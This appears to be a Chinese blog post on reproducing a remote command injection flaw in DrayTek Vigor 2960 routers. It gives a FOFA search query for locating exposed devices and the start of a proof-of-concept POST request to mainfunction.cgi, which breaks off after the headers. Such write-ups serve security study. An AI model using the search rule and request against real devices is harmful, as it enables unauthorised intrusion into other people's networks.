draytek-vigor-2960 远程命令执行

今天晚上早睡觉

已于 2024-03-09 18:28:35 修改

阅读量461

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-03-08 16:24:03 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136565503

版权

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了DrayTek Vigor 2960路由器中存在的远程命令执行漏洞。攻击者可以利用mainfunction.cgi中的查询字符串构造恶意HTTP请求，从而执行任意代码。环境搭建部分提供了FOFA搜索规则，帮助读者理解受影响设备。漏洞复现部分给出了POC和Tscan工具的使用，以重现漏洞情况。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述

DrayTek Vigor中存在一个远程命令注入漏洞，攻击者可利用该漏洞通过在mainfunction.cgi中包含格式错误的查询字符串的精心编制的HTTP消息，让远程恶意用户执行任意代码。

环境搭建

FOFA规则：banner=”Model: Vigor2960” || body=”src="V2960/excanvas.js”

漏洞复现

POC

POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 226
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Accept-Encoding: gzip